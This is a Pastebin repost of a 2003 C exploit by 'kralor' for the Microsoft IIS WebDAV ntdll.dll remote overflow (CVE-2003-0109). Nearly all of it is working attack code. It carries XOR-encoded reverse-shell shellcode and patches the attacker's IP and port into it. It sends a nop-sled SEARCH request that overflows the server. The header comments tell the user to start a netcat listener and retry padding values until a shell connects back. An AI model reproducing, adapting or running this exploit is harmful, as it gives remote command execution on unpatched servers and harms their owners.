Advertisement
FlyFar

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow - CVE-2003-0109

Jan 23rd, 2024
607
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.10 KB | Cybersecurity | 0 0
  1. /*******************************************************************/
  2. /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
  3. /* --------------------------------------------------------------- */
  4. /* this is the exploit for ntdll.dll through WebDAV. */
  5. /* run a netcat ex: nc -L -vv -p 666 */
  6. /* wb server.com your_ip 666 0 */
  7. /* the shellcode is a reverse remote shell */
  8. /* you need to pad a bit.. the best way I think is launching */
  9. /* the exploit with pad = 0 and after that, the server will be */
  10. /* down for a couple of seconds, now retry with pad at 1 */
  11. /* and so on..pad 2.. pad 3.. if you haven't the shell after */
  12. /* something like pad at 10 I think you better to restart from */
  13. /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
  14. /* on all the others servers it was at 2,3,4, etc..sometimes */
  15. /* you can have the force with you, and get the shell in 1 try */
  16. /* sometimes you need to pad more than 10 times ;) */
  17. /* the shellcode was coded by myself, it is SEH + ScanMem to */
  18. /* find the famous offsets (GetProcAddress).. */
  19. /* */
  20. /*******************************************************************/
  21.  
  22.  
  23. #include <winsock.h>
  24. #include <windows.h>
  25. #include <stdio.h>
  26.  
  27. #pragma comment (lib,"ws2_32")
  28.  
  29. char shellc0de[] =
  30. "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
  31. "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
  32. "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
  33. "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
  34. "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
  35. "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
  36. "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
  37. "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
  38. "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
  39. "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
  40. "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
  41. "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
  42. "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
  43. "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
  44. "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
  45. "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
  46. "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
  47. "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
  48. "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
  49. "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
  50. "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
  51. "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
  52. "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
  53. "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
  54. "\xff\xd0"
  55. "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
  56. "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
  57. "cmd" // don't change anything..
  58. "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
  59. "\x00\x00\xe8\x77"
  60. "\x00\x00\xf0\x77"
  61. "\x00\x00\xe4\x77"
  62. "\x00\x88\x3e\x04" // win2k3
  63. "\x00\x00\xf7\xbf" // win9x =P
  64. "\xff\xff\xff\xff";
  65.  
  66. int test_host(char *host)
  67. {
  68. char search[100]="";
  69. int sock;
  70. struct hostent *heh;
  71. struct sockaddr_in hmm;
  72. char buf[100] ="";
  73.  
  74. if(strlen(host)>60) {
  75. printf("error: victim host too long.\r\n");
  76. return 1;
  77. }
  78.  
  79. if ((heh = gethostbyname(host))==0){
  80. printf("error: can't resolve '%s'",host);
  81. return 1;
  82. }
  83.  
  84. sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
  85. hmm.sin_port = htons(80);
  86. hmm.sin_family = AF_INET;
  87. hmm.sin_addr = *((struct in_addr *)heh->h_addr);
  88.  
  89. if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  90. printf("error: can't create socket");
  91. return 1;
  92. }
  93.  
  94. printf("Checking WebDav on '%s' ... ",host);
  95.  
  96. if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
  97. printf("CONNECTING_ERROR\r\n");
  98. return 1;
  99. }
  100. send(sock,search,strlen(search),0);
  101. recv(sock,buf,sizeof(buf),0);
  102. if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
  103. return 0;
  104. printf("NOT FOUND\r\n");
  105. return 1;
  106. }
  107.  
  108. void help(char *program)
  109. {
  110. printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
  111. return;
  112. }
  113.  
  114. void banner(void)
  115. {
  116. printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
  117. [Crpt]\r\n");
  118. printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
  119. return;
  120. }
  121.  
  122. void main(int argc, char *argv[])
  123. {
  124. WSADATA wsaData;
  125. unsigned short port=0;
  126. char *port_to_shell="", *ip1="", data[50]="";
  127. unsigned int i,j;
  128. unsigned int ip = 0 ;
  129. int s, PAD=0x10;
  130. struct hostent *he;
  131. struct sockaddr_in crpt;
  132. char buffer[65536] ="";
  133. char request[80000]; // huuuh, what a mess! :)
  134. char content[] =
  135. "<?xml version=\"1.0\"?>\r\n"
  136. "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  137. "<g:sql>\r\n"
  138. "Select \"DAV:displayname\" from scope()\r\n"
  139. "</g:sql>\r\n"
  140. "</g:searchrequest>\r\n";
  141.  
  142. banner();
  143. if((argc<4)||(argc>5)) {
  144. help(argv[0]);
  145. return;
  146. }
  147.  
  148. if(WSAStartup(0x0101,&wsaData)!=0) {
  149. printf("error starting winsock..");
  150. return;
  151. }
  152.  
  153. if(test_host(argv[1]))
  154. return;
  155.  
  156. if(argc==5)
  157. PAD+=atoi(argv[4]);
  158.  
  159. printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
  160.  
  161. ip = inet_addr(argv[2]); ip1 = (char*)&ip;
  162.  
  163. shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
  164. shellc0de[451]=ip1[3];
  165.  
  166. port = htons(atoi(argv[3]));
  167. port_to_shell = (char *) &port;
  168. shellc0de[446]=port_to_shell[0];
  169. shellc0de[447]=port_to_shell[1];
  170.  
  171. // we xor the shellcode [xored by 0x95 to avoid bad chars]
  172. __asm {
  173. lea eax, shellc0de
  174. add eax, 0x34
  175. xor ecx, ecx
  176. mov cx, 0x1b0
  177. wah:
  178. xor byte ptr[eax], 0x95
  179. inc eax
  180. loop wah
  181. }
  182.  
  183. if ((he = gethostbyname(argv[1]))==0){
  184. printf("error: can't resolve '%s'",argv[1]);
  185. return;
  186. }
  187.  
  188. crpt.sin_port = htons(80);
  189. crpt.sin_family = AF_INET;
  190. crpt.sin_addr = *((struct in_addr *)he->h_addr);
  191.  
  192. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  193. printf("error: can't create socket");
  194. return;
  195. }
  196.  
  197. printf("Connecting... ");
  198.  
  199. if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
  200. printf("ERROR\r\n");
  201. return;
  202. }
  203. // No Operation.
  204. for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
  205. // fill the buffer with the shellcode
  206. for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
  207. // well..it is not necessary..
  208. for(i=0;i<2500;buffer[i]=PAD,i++);
  209.  
  210. /* we can simply put our ret in this 2 offsets.. */
  211. //buffer[2086]=PAD;
  212. //buffer[2085]=PAD;
  213.  
  214. buffer[sizeof(buffer)]=0x00;
  215. memset(request,0,sizeof(request));
  216. memset(data,0,sizeof(data));
  217. sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
  218. sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
  219. printf("CONNECTED\r\nSending evil request... ");
  220. send(s,request,strlen(request),0);
  221. send(s,content,strlen(content),0);
  222. printf("SENT\r\n");
  223. recv(s,data,sizeof(data),0);
  224. if(data[0]!=0x00) {
  225. printf("Server seems to be patched.\r\n");
  226. printf("data: %s\r\n",data);
  227. } else
  228. printf("Now if you are lucky you will get a shell.\r\n");
  229. closesocket(s);
  230. return;
  231. }
  232.  
  233. // milw0rm.com [2003-03-23]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement